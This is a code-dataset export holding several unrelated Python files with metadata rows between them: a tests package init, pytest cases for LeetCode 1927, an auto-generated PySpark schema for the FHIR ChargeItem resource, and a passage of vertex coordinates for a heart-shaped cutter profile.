"BSD-3-Clause"
] | null | null | null |
icanhaz/tests/__init__.py
|
carljm/django-icanhaz
|
57939325850058959c1ee8dce13e2b8c28156532
|
[
"BSD-3-Clause"
] | 2
|
2016-02-04T16:28:47.000Z
|
2016-04-06T16:18:17.000Z
|
from .test_finders import *
from .test_loading import *
from .test_ttag import *
| 20.25
| 27
| 0.777778
| 12
| 81
| 5
| 0.5
| 0.4
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 81
| 3
| 28
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ad0c4a317bdd27ee30f2bfadf25ae9c7f408a0e5
| 1,298
|
py
|
Python
|
tests/test_1927.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1927.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1927.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1927. Sum Game
"""
@pytest.fixture(scope="session")
def init_variables_1927():
    """Session-scoped factory yielding a shared Solution instance for 1927."""
    from src.leetcode_1927_sum_game import Solution

    shared_solution = Solution()

    def _factory():
        return shared_solution

    yield _factory
class TestClass1927:
    """Tests for LeetCode 1927 (Sum Game)."""

    def test_solution_0(self, init_variables_1927):
        solver = init_variables_1927()
        assert not solver.sumGame("5023")

    def test_solution_1(self, init_variables_1927):
        solver = init_variables_1927()
        assert solver.sumGame("25??")

    def test_solution_2(self, init_variables_1927):
        solver = init_variables_1927()
        assert not solver.sumGame("?3295???")
#!/usr/bin/env python
import pytest
"""
Test 1927. Sum Game
"""
@pytest.fixture(scope="session")
def init_variables_1927():
    """Session-scoped factory yielding a shared Solution instance for 1927."""
    from src.leetcode_1927_sum_game import Solution

    shared_solution = Solution()

    def _factory():
        return shared_solution

    yield _factory
class TestClass1927:
    """Tests for LeetCode 1927 (Sum Game)."""

    def test_solution_0(self, init_variables_1927):
        solver = init_variables_1927()
        assert not solver.sumGame("5023")

    def test_solution_1(self, init_variables_1927):
        solver = init_variables_1927()
        assert solver.sumGame("25??")

    def test_solution_2(self, init_variables_1927):
        solver = init_variables_1927()
        assert not solver.sumGame("?3295???")
| 20.603175
| 60
| 0.713405
| 168
| 1,298
| 5.166667
| 0.202381
| 0.269585
| 0.352535
| 0.145161
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.114662
| 0.180277
| 1,298
| 62
| 61
| 20.935484
| 0.701128
| 0.030817
| 0
| 1
| 0
| 0
| 0.03827
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.333333
| false
| 0
| 0.133333
| 0.066667
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
ad8561e6e50b21a52b30483aa9c77b2a9f6b7282
| 42,885
|
py
|
Python
|
spark_fhir_schemas/r4/resources/chargeitem.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | 2
|
2020-10-31T23:25:01.000Z
|
2021-06-09T14:12:42.000Z
|
spark_fhir_schemas/r4/resources/chargeitem.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/resources/chargeitem.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import (
StructType,
StructField,
StringType,
ArrayType,
DataType,
TimestampType,
)
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class ChargeItemSchema:
"""
The resource ChargeItem describes the provision of healthcare provider
products for a certain patient, therefore referring not only to the product,
but containing in addition details of the provision, like date, time, amounts
and participating organizations and persons. Main Usage of the ChargeItem is
to enable the billing process and internal cost allocation.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
],
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
) -> Union[StructType, DataType]:
"""
The resource ChargeItem describes the provision of healthcare provider
products for a certain patient, therefore referring not only to the product,
but containing in addition details of the provision, like date, time, amounts
and participating organizations and persons. Main Usage of the ChargeItem is
to enable the billing process and internal cost allocation.
resourceType: This is a ChargeItem resource
id: The logical id of the resource, as used in the URL for the resource. Once
assigned, this value never changes.
meta: The metadata about the resource. This is content that is maintained by the
infrastructure. Changes to the content might not always be associated with
version changes to the resource.
implicitRules: A reference to a set of rules that were followed when the resource was
constructed, and which must be understood when processing the content. Often,
this is a reference to an implementation guide that defines the special rules
along with other profiles etc.
language: The base language in which the resource is written.
text: A human-readable narrative that contains a summary of the resource and can be
used to represent the content of the resource to a human. The narrative need
not encode all the structured data, but is required to contain sufficient
detail to make it "clinically safe" for a human to just read the narrative.
Resource definitions may define what content should be represented in the
narrative to ensure clinical safety.
contained: These resources do not have an independent existence apart from the resource
that contains them - they cannot be identified independently, and nor can they
have their own independent transaction scope.
extension: May be used to represent additional information that is not part of the basic
definition of the resource. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the resource and that modifies the understanding of the element
that contains it and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer is allowed to define an extension, there is a set of requirements
that SHALL be met as part of the definition of the extension. Applications
processing a resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
identifier: Identifiers assigned to this event performer or other systems.
definitionUri: References the (external) source of pricing information, rules of application
for the code this ChargeItem uses.
definitionCanonical: References the source of pricing information, rules of application for the
code this ChargeItem uses.
status: The current state of the ChargeItem.
partOf: ChargeItems can be grouped to larger ChargeItems covering the whole set.
code: A code that identifies the charge, like a billing code.
subject: The individual or set of individuals the action is being or was performed on.
context: The encounter or episode of care that establishes the context for this event.
occurrenceDateTime: Date/time(s) or duration when the charged service was applied.
occurrencePeriod: Date/time(s) or duration when the charged service was applied.
occurrenceTiming: Date/time(s) or duration when the charged service was applied.
performer: Indicates who or what performed or participated in the charged service.
performingOrganization: The organization requesting the service.
requestingOrganization: The organization performing the service.
costCenter: The financial cost center permits the tracking of charge attribution.
quantity: Quantity of which the charge item has been serviced.
bodysite: The anatomical location where the related service has been applied.
factorOverride: Factor overriding the factor determined by the rules associated with the code.
priceOverride: Total price of the charge overriding the list price associated with the code.
overrideReason: If the list price or the rule-based factor associated with the code is
overridden, this attribute can capture a text to indicate the reason for this
action.
enterer: The device, practitioner, etc. who entered the charge item.
enteredDate: Date the charge item was entered.
reason: Describes why the event occurred in coded or textual form.
service: Indicated the rendered service that caused this charge.
productReference: Identifies the device, food, drug or other product being charged either by
type code or reference to an instance.
productCodeableConcept: Identifies the device, food, drug or other product being charged either by
type code or reference to an instance.
account: Account into which this ChargeItems belongs.
note: Comments made about the event by the performer, subject or other participants.
supportingInformation: Further information supporting this charge.
"""
from spark_fhir_schemas.r4.simple_types.id import idSchema
from spark_fhir_schemas.r4.complex_types.meta import MetaSchema
from spark_fhir_schemas.r4.simple_types.uri import uriSchema
from spark_fhir_schemas.r4.simple_types.code import codeSchema
from spark_fhir_schemas.r4.complex_types.narrative import NarrativeSchema
from spark_fhir_schemas.r4.complex_types.resourcelist import ResourceListSchema
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.identifier import IdentifierSchema
from spark_fhir_schemas.r4.simple_types.canonical import canonicalSchema
from spark_fhir_schemas.r4.complex_types.reference import ReferenceSchema
from spark_fhir_schemas.r4.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.r4.complex_types.period import PeriodSchema
from spark_fhir_schemas.r4.complex_types.timing import TimingSchema
from spark_fhir_schemas.r4.complex_types.chargeitem_performer import (
ChargeItem_PerformerSchema,
)
from spark_fhir_schemas.r4.complex_types.quantity import QuantitySchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.complex_types.money import MoneySchema
from spark_fhir_schemas.r4.simple_types.datetime import dateTimeSchema
from spark_fhir_schemas.r4.complex_types.annotation import AnnotationSchema
if (
max_recursion_limit
and nesting_list.count("ChargeItem") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["ChargeItem"]
schema = StructType(
[
# This is a ChargeItem resource
StructField("resourceType", StringType(), True),
# The logical id of the resource, as used in the URL for the resource. Once
# assigned, this value never changes.
StructField(
"id",
idSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The metadata about the resource. This is content that is maintained by the
# infrastructure. Changes to the content might not always be associated with
# version changes to the resource.
StructField(
"meta",
MetaSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# A reference to a set of rules that were followed when the resource was
# constructed, and which must be understood when processing the content. Often,
# this is a reference to an implementation guide that defines the special rules
# along with other profiles etc.
StructField(
"implicitRules",
uriSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The base language in which the resource is written.
StructField(
"language",
codeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# A human-readable narrative that contains a summary of the resource and can be
# used to represent the content of the resource to a human. The narrative need
# not encode all the structured data, but is required to contain sufficient
# detail to make it "clinically safe" for a human to just read the narrative.
# Resource definitions may define what content should be represented in the
# narrative to ensure clinical safety.
StructField(
"text",
NarrativeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# These resources do not have an independent existence apart from the resource
# that contains them - they cannot be identified independently, and nor can they
# have their own independent transaction scope.
StructField(
"contained",
ArrayType(
ResourceListSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the resource. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the resource and that modifies the understanding of the element
# that contains it and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer is allowed to define an extension, there is a set of requirements
# that SHALL be met as part of the definition of the extension. Applications
# processing a resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Identifiers assigned to this event performer or other systems.
StructField(
"identifier",
ArrayType(
IdentifierSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# References the (external) source of pricing information, rules of application
# for the code this ChargeItem uses.
StructField(
"definitionUri",
ArrayType(
uriSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# References the source of pricing information, rules of application for the
# code this ChargeItem uses.
StructField(
"definitionCanonical",
ArrayType(
canonicalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# The current state of the ChargeItem.
StructField("status", StringType(), True),
# ChargeItems can be grouped to larger ChargeItems covering the whole set.
StructField(
"partOf",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# A code that identifies the charge, like a billing code.
StructField(
"code",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The individual or set of individuals the action is being or was performed on.
StructField(
"subject",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The encounter or episode of care that establishes the context for this event.
StructField(
"context",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Date/time(s) or duration when the charged service was applied.
StructField("occurrenceDateTime", TimestampType(), True),
# Date/time(s) or duration when the charged service was applied.
StructField(
"occurrencePeriod",
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Date/time(s) or duration when the charged service was applied.
StructField(
"occurrenceTiming",
TimingSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Indicates who or what performed or participated in the charged service.
StructField(
"performer",
ArrayType(
ChargeItem_PerformerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# The organization requesting the service.
StructField(
"performingOrganization",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The organization performing the service.
StructField(
"requestingOrganization",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The financial cost center permits the tracking of charge attribution.
StructField(
"costCenter",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Quantity of which the charge item has been serviced.
StructField(
"quantity",
QuantitySchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The anatomical location where the related service has been applied.
StructField(
"bodysite",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Factor overriding the factor determined by the rules associated with the code.
StructField(
"factorOverride",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Total price of the charge overriding the list price associated with the code.
StructField(
"priceOverride",
MoneySchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# If the list price or the rule-based factor associated with the code is
# overridden, this attribute can capture a text to indicate the reason for this
# action.
StructField("overrideReason", StringType(), True),
# The device, practitioner, etc. who entered the charge item.
StructField(
"enterer",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Date the charge item was entered.
StructField(
"enteredDate",
dateTimeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Describes why the event occurred in coded or textual form.
StructField(
"reason",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Indicated the rendered service that caused this charge.
StructField(
"service",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Identifies the device, food, drug or other product being charged either by
# type code or reference to an instance.
StructField(
"productReference",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Identifies the device, food, drug or other product being charged either by
# type code or reference to an instance.
StructField(
"productCodeableConcept",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Account into which this ChargeItems belongs.
StructField(
"account",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Comments made about the event by the performer, subject or other participants.
StructField(
"note",
ArrayType(
AnnotationSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Further information supporting this charge.
StructField(
"supportingInformation",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 51.175418
| 106
| 0.546835
| 3,733
| 42,885
| 6.02143
| 0.107152
| 0.075274
| 0.04738
| 0.072604
| 0.864979
| 0.851232
| 0.841312
| 0.809992
| 0.80581
| 0.789483
| 0
| 0.003144
| 0.414014
| 42,885
| 837
| 107
| 51.236559
| 0.891325
| 0.247406
| 0
| 0.765176
| 0
| 0
| 0.0202
| 0.002759
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001597
| false
| 0
| 0.033546
| 0
| 0.039936
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad965fd326a5ccf4b854d74a86cef58e6f8f6fc6
| 3,167
|
py
|
Python
|
op_cutter/profile_heart.py
|
AlexanderMazaletskiy/jewelcraft
|
b40937471a8c9a823760666156600aaa424eb322
|
[
"MIT"
] | null | null | null |
op_cutter/profile_heart.py
|
AlexanderMazaletskiy/jewelcraft
|
b40937471a8c9a823760666156600aaa424eb322
|
[
"MIT"
] | null | null | null |
op_cutter/profile_heart.py
|
AlexanderMazaletskiy/jewelcraft
|
b40937471a8c9a823760666156600aaa424eb322
|
[
"MIT"
] | 1
|
2020-06-17T07:46:45.000Z
|
2020-06-17T07:46:45.000Z
|
# Closed 2D outline polygon given as (x, y, z) triples in the XY plane
# (z is always 0.0).  The sequence starts at the top centre (0.0, 0.3371),
# traces the left half (negative x) down to the bottom tip (0.0, -0.5828),
# then mirrors back up the right half with x negated, so the outline is
# symmetric about the Y axis.  Presumably a heart-shaped cutter profile
# (file path suggests op_cutter/profile_heart.py) — TODO confirm.
vertex_coords = (
    (0.0, 0.3371, 0.0),
    (-0.0229, 0.3378, 0.0),
    (-0.0449, 0.3398, 0.0),
    (-0.066, 0.3429, 0.0),
    (-0.0864, 0.3467, 0.0),
    (-0.1062, 0.3511, 0.0),
    (-0.1255, 0.3557, 0.0),
    (-0.1445, 0.3603, 0.0),
    (-0.1633, 0.3646, 0.0),
    (-0.1819, 0.3684, 0.0),
    (-0.2006, 0.3715, 0.0),
    (-0.2193, 0.3735, 0.0),
    (-0.2383, 0.3742, 0.0),
    (-0.2577, 0.3734, 0.0),
    (-0.2776, 0.3707, 0.0),
    (-0.298, 0.366, 0.0),
    (-0.3192, 0.359, 0.0),
    (-0.3377, 0.3514, 0.0),
    (-0.3551, 0.3432, 0.0),
    (-0.3716, 0.3343, 0.0),
    (-0.387, 0.3248, 0.0),
    (-0.4015, 0.3145, 0.0),
    (-0.4151, 0.3036, 0.0),
    (-0.4277, 0.2918, 0.0),
    (-0.4394, 0.2793, 0.0),
    (-0.4501, 0.266, 0.0),
    (-0.46, 0.2519, 0.0),
    (-0.469, 0.2368, 0.0),
    (-0.477, 0.2209, 0.0),
    (-0.4843, 0.2041, 0.0),
    (-0.4907, 0.1863, 0.0),
    (-0.4962, 0.1675, 0.0),
    (-0.5009, 0.1478, 0.0),
    (-0.5043, 0.1263, 0.0),
    (-0.5056, 0.104, 0.0),
    (-0.5049, 0.0812, 0.0),
    (-0.5024, 0.0577, 0.0),
    (-0.4981, 0.0337, 0.0),
    (-0.4921, 0.0092, 0.0),
    (-0.4846, -0.0157, 0.0),
    (-0.4757, -0.0409, 0.0),
    (-0.4654, -0.0664, 0.0),
    (-0.4539, -0.0922, 0.0),
    (-0.4413, -0.118, 0.0),
    (-0.4278, -0.144, 0.0),
    (-0.4133, -0.17, 0.0),
    (-0.3981, -0.1959, 0.0),
    (-0.3822, -0.2217, 0.0),
    (-0.3657, -0.2474, 0.0),
    (-0.3454, -0.2771, 0.0),
    (-0.3242, -0.3058, 0.0),
    (-0.3022, -0.3334, 0.0),
    (-0.2796, -0.3599, 0.0),
    (-0.2564, -0.3852, 0.0),
    (-0.2328, -0.4093, 0.0),
    (-0.2088, -0.4323, 0.0),
    (-0.1847, -0.4541, 0.0),
    (-0.1606, -0.4747, 0.0),
    (-0.1365, -0.494, 0.0),
    (-0.1126, -0.5121, 0.0),
    (-0.089, -0.5288, 0.0),
    (-0.0658, -0.5443, 0.0),
